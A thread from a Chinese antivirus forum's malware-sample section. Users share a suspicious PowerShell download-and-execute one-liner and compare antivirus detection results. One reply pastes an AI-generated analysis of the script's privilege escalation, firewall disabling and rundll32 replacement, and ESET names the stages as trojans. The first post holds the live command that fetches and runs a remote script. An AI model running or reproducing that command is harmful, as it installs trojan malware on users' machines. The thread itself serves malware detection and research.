查看: 337|回复: 7
收起左侧

[病毒样本] 可疑代码脚本

[复制链接]
啊松
发表于 昨天 16:22 | 显示全部楼层 |阅读模式
本帖最后由 啊松 于 2025-3-10 16:34 编辑

https://wwum.lanzoub.com/iGzrI2q6uh5c




powershell "$url='https://vip.123yx.com/1844947338/20250106/EG.ps1';try {iex(irm $url)}catch{$var=&'curl.exe' -s -L $url|Out-String;iex $var}"











卡巴标准版拦截下载









本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +15 人气 +1 收起 理由
QVM360 + 15 + 1 版区有你更精彩: )

查看全部评分

Loyisa
发表于 昨天 16:31 | 显示全部楼层
360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
lsop1349987
发表于 昨天 16:46 | 显示全部楼层
本帖最后由 lsop1349987 于 2025-3-10 16:54 编辑

eis+Avira运行miss

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 昨天 20:05 | 显示全部楼层
火绒3.9

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
郭俊民
发表于 昨天 20:51 | 显示全部楼层
DeepSeek引擎
  1. 脚本安全性分析及评分(1.00为最高风险)

  2. 文档1分析(PowerShell脚本)
  3. 1. 权限提升行为  
  4.    - 脚本强制要求管理员权限,若未以管理员运行则会自我重启并绕过执行策略(`ExecutionPolicy Bypass`)。  
  5.    - 风险:高。绕过权限限制可能用于恶意操作。

  6. 2. 系统服务操作  
  7.    - 停止名为 `MessageTransfer` 的服务(可能为虚构服务名)。  
  8.    - 风险:中。需确认服务真实性,但恶意软件常通过停止服务干扰安全防护。

  9. 3. 注册表清理  
  10.    - 删除 `HKCU:\Software\...\Explorer` 下的 `RunMRU`、`RecentDocs` 等键值,清除用户操作记录。  
  11.    - 风险:低。通常用于隐藏痕迹,但本身无害。

  12. 4. 安全策略篡改  
  13.    - 关闭防火墙(`Set-NetFirewallProfile -Enabled False`)并禁用 Hyper-V。  
  14.    - 风险:极高。直接削弱系统安全防护。

  15. 5. 进程终止行为  
  16.    - 强制终止 `rundll32.exe` 进程(循环11次)。  
  17.    - 风险:高。可能用于终止安全软件或驻留进程。

  18. 6. 远程文件下载与执行  
  19.    - 从 `https://vip.123yx.com/.../EG.txt` 下载 Base64 编码文件,解码后保存为 `rundll32.exe`(覆盖系统文件)。  
  20.    - 通过 `rundll32.exe` 执行恶意负载(`Start-Process rundll32.exe ...`)。  
  21.    - 风险:极高。远程代码执行(RCE)是典型恶意行为,替换系统文件可能导致持久化攻击。

  22. ---

  23. 文档2分析(Base64编码二进制文件)
  24. - 解码后为 PE 文件(Windows 可执行文件),但需动态分析确认具体行为。  
  25. - 风险:结合文档1的下载逻辑,该文件极可能是恶意负载(如远控木马、勒索软件)。

  26. ---

  27. 综合评分  
  28. 风险等级:1.00(最高风险)  
  29. - 依据:  
  30.   1. 提权、关闭防火墙、禁用 Hyper-V 直接破坏系统安全。  
  31.   2. 下载并执行远程代码,覆盖系统关键文件(`rundll32.exe`)。  
  32.   3. 行为符合高级持续性威胁(APT)特征,可能用于窃取数据或植入后门。

  33. ---

  34. 建议  
  35. - 立即隔离并删除该脚本及衍生文件(如 `EG.txt`)。  
  36. - 扫描系统是否存在 `rundll32.exe` 异常版本(路径 `C:\Windows\SysWOW64\`)。  
  37. - 检查防火墙状态和 Hyper-V 功能是否被篡改。  
  38. - 使用安全软件全面查杀,并监控网络连接(域名 `vip.123yx.com` 需加入黑名单)。
复制代码


LSPD
发表于 昨天 21:33 | 显示全部楼层
MD miss
Rukia
发表于 昨天 21:34 | 显示全部楼层
ESET 已上报
The detection for this threat will be included in the next update of detection engine 30847

EG.ps1 - PowerShell/TrojanDownloader.Agent.LJJ trojan

EG.txt » BASE64 » decoded.exe - Win32/FlyStudio.ORW trojan
biue
发表于 昨天 23:14 | 显示全部楼层
腾讯电脑管家 1X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-3-11 06:28 , Processed in 0.119305 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表